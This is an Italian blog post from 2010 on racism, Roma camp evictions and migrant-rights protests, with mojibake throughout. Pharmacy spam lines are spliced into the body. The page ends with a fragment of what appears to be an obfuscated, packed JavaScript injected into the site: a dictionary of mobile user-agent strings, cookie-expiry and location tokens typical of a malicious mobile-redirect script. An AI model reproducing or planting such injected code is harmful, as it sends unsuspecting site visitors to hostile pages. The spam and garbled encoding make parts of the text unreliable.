quando i diritti vanno ribaditi.


Se le premesse sono queste il 2010 A? la??anno del razzismo e della xenofobia.

Basta anche solo ricordare i fatti piA? importanti per capire che la??Italia sta peggiorando.

7 gennaio, esplode la rivolta a Rosarno, centinaia di immigrati a??impiegatia??, o meglio usati, nella raccolta delle arance che vivevano nella Piana di Gioia Tauro in condizioni inumane si ribellano alla??ennesimo episodio di discriminazione e violenza e vengono trasferiti nei CIE piA? vicini.

20 gennaio, compare in un negozio di Empoli il cartello: a??Vietato ai cinesi che non parlano italianoa??, come se tutto il mondo dovesse svegliarsi e conoscere la nostra lingua per avere dei diritti.

28 gennaio, meno chiacchierato, il suicidio di una ragazzina romena stanca di essere chiamata a??sporca romenaa??, forse una delle poche non passate sotto silenzio.

7 febbraio, il Ministro della??Interno e quello del Lavoro, Salute e Politiche sociali iniziano a lavorare al decreto per il Permesso di soggiorno a Punti, giA? previsto nel precedente e famigerato pacchetto sicurezza che avrebbe dovuto dissolvere il senso di paura degli italiani, quel senso di terrore e disprezzo verso gli immigrati creato in buona parte dai media e dalle azioni di palese propaganda. Per vivere in Italia devi collezionare trenta punti, come al supermercato, e per averli devi dimostrare di conoscere la??italiano, la Costituzione, avere un lavoro e mandare i tuoi figli a scuola, tutto questo in due anni, al massimo te ne viene concesso un terzo per migliorare la a??collezionea??. Il Ministro Maroni, della Lega Nord, quella stessa Lega Nord che in piA? occasioni ha dimostrato di non rispettare la bandiera italiana, simbolo del nostro Paese tanto quanto la Costituzione scritta da chi certo era piA? consapevole del significato delle parole diritti e doveri, dice che A? solo un modo per dire agli immigrati come si devono integrare, e che se non lo fanno evidentemente non si voglio integrare, non dice perA? che A? la??ennesimo ostacolo posto alla regolarizzazione dei cittadini stranieri, e non sarebbe poi tanto un problema se ci sapesse anche dire come si fa a non scappare dalla fame, dalla guerra e dalla miseria di un Paese in cui sei nato non per scelta!

womens viagra in india

A?

E poi via, ancora, con gli sgomberi dei campi Rom, operazioni costose e senza utilitA? perchA? spostano, ricreando in nuovi siti una situazione identica alla precedente, persone con cui in molti casi le associazioni hanno iniziato percorsi da??inclusione sociale che sa??interrompono al trasferimento/sgombero.

19 gennaio, Roma: sgombero di 100 rom da Via Solone;

10 febbraio, Chiaravalle: 120 Rom romeni, di cui 60 minorenni, buttati in mezzo alla strada dal Comune di Milano (che vede in attivo nel suo bilancio 27 sgomberi dalla??inizio del 2010, ossia piA? o meno uno ogni due giorni);

15 febbraio, viene portato a termine lo sgombero del Casilino 900, campo nato 40 anni fa su cui il terzo settore e la societA? civile aveva avviato diverse attivitA? volte alla??inserimento sociale, e di Tor dei Cenci (Roma), campo del 1995 assegnato dalla??allora Sindaco Rutelli;

17 febbraio, sgombero del campo di Cosenza per il quale anche il Vescovo della cittA? ha dovuto fare appello alla politica e al senso di accoglienza della comunitA?.

E per chiudere in bellezza, via Padova: la settimana scorsa, scoppia una rissa per un piede pestato e un ragazzo di origine egiziana con regolare permesso di soggiorno viene ucciso, e altri feriti. A? vero, gli abitanti della zona chiedono aiuto, ma molti si preoccupano solo della svalutazione dei loro immobili come diversi servizi delle reti televisive hanno fatto vedere, ma non si sono preoccupati di sottolineare che la vera preoccupazione andrebbe rivolta alla persone. Senza dimenticare il Mediterraneo, dove i viaggi della speranza certo non guardano il calendario.

Girando un poa?? su Internet non A? difficile scoprire che la stampa esterna ci addita come Paese piA? razzista e xenofobo da??Europa, se non del Mondo. Verrebbe da dire a??meno male che ca??A? la Libia, che forse ci ruba la pole positiona??, ma poiA? trovi sondaggi fatti nelle scuole, che dicono che il 58% degli adolescenti A? contrario alla presenza degli stranieri in Italia (italiarazzismo.it).

Dove andremo aA? finire? Ma davvero non ci rendiamo piA? conto del valore di una societA? multietnica? E non solo dal punto di vista socio culturale, ma anche economico!A? Ma qualcuno che prova ancora a ricordarcelo ca??A?: sono i migranti e tutti gli italiani a??illuminatia?? del nostro Paese.

A?

Il 27 febbraio sarA? la giornata in cui si ribadisce il concettoA? a??diritti diseguali= meno diritti per tuttia?? in piazza Saluzzo a Torino dalle ore 17.00, per condannare i linguaggi discriminatori, il razzismo, e in particolare a??quello delle Istituzioni, con la??utilizzo strumentale del richiamo alle radici culturali e della religione per giustificare politiche, locali e nazionali, di rifiuto ed esclusionea??, come sostengono gli organizzatori, tra cui Terra del Fuoco, ASGI, Ufficio Pastorale Migranti, CGIL Torino, e molte associazioni di migranti.

Altra iniziativa importante sarA?, sempre il 27 febbraio, a??I diritti alzano la vocea?? promossa da ARCI e molti altri, che scenderanno in piazza in diverse cittA? italiane per sostenere la??importanza dei diritti perchA? a??il welfare A? nato per garantire uguaglianza e giustizia sociale, tutelarci dai rischi e dalle difficoltA? che tutti incontrano nella vitaa??. In questa occasione verranno inoltre raccolte le firme dei cittadini per sostenere a??Le 10 proposte per un Italia civilea??.

EA? siccome non A? mai abbastanza, tutti gli immigrati e gli italiani a sostegno di una societA? della??accoglienza si ritroveranno la??1 Marzo, A?nelle piazze di tutta Italia, per lo sciopero dei migranti a??24 ore senza di noia??, perchA? diventa sempre piA? urgente far capire a tutti a??quanto sia importante la??apporto dei migranti alla tenuta e funzionalitA? della societA?a??.A? Per questa mobilitazione si A? scelto il colore giallo, cosA? come per la??ormai noto Spauracchio di Sami della campagna a??Non aver paura. Apriti agli altri. Apri ai dirittia??, un colore simbolo del cambiamento e slegato da ogni connotazione politica.

Per saperne di piA? visitate il sito A?Primo Marzo 2010 o cercate il gruppo a??Primo Marzo 2010 a?? Sciopero degli stranieri a?? Gruppo Torinoa?? su Facebook.

overthe couunter asthma inhalers A?

A?

A?

ion|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))